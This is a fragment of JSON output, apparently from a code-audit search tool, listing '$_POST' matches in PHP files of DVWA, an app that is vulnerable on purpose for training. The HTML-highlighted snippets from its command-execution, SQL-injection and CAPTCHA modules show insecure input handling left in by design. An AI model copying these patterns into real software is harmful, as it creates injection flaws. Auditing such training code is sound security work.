<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 130,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 131,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check CAPTCHA from 3rd party\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$resp</span> <span class=\"token operator\">=</span> <span class=\"token function\">recaptcha_check_answer</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_DVWA</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_private_key'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_challenge_field'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'recaptcha_response_field'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Did the CAPTCHA fail<span class=\"token operator\">?</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$resp</span><span class=\"token operator\">-</span><span class=\"token operator\">></span>is_valid <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> What happens when the CAPTCHA was entered incorrectly\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 15,
"start": 10,
"end": 21,
"severity": "unknown",
"note": ""
},
{
"id": 132,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">41:</span> \t\t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">42:</span> \t\t}\n<span class=\"line-number\">43:</span> \t}\n<span class=\"line-number\">44:</span> }\n<span class=\"line-number\">45:</span> \n<span class=\"highlight\"><span class=\"line-number\">46:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 46,
"start": 41,
"end": 52,
"severity": "unknown",
"note": ""
},
{
"id": 133,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">46:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Change'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'step'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string\">'2'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">53:</span> \n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> they did stage <span class=\"token number\">1</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'passed_captcha'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />You have not passed the CAPTCHA.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 51,
"start": 46,
"end": 57,
"severity": "unknown",
"note": ""
},
{
"id": 134,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">47:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Hide the CAPTCHA form\n<span class=\"line-number\">48:</span> \t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">49:</span> \n<span class=\"line-number\">50:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">51:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">52:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">53:</span> \n<span class=\"line-number\">54:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check <span class=\"token keyword\">to</span> see <span class=\"token keyword\">if</span> they did stage <span class=\"token number\">1</span>\n<span class=\"line-number\">55:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'passed_captcha'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">56:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre><br />You have not passed the CAPTCHA.</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">57:</span> \t\t<span class=\"token variable\">$hide_form</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 52,
"start": 47,
"end": 58,
"severity": "unknown",
"note": ""
},
{
"id": 173,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">trim</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 177,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 183,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 187,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Set blacklist\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$substitutions</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 236,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\"><</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</script>\";</span>\n<span class=\"line-number\">16:</span> }",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 237,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/session-input.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'SQL Injection Session Input'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID set!<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Session ID: {$_SESSION[ 'id' ]}<br /><br /><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"<span class=\"token operator\"><</span>script<span class=\"token operator\">></span>window<span class=\"token punctuation\">.</span>opener<span class=\"token punctuation\">.</span>location<span class=\"token punctuation\">.</span><span class=\"token function\">reload</span><span class=\"token punctuation\">(</span><span class=\"token boolean\">true</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</script>\";</span>\n<span class=\"line-number\">16:</span> }\n<span class=\"line-number\">17:</span> ",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 247,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 248,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/medium.php",
"filetype": "php",
"search": "\\s\\$_POST",
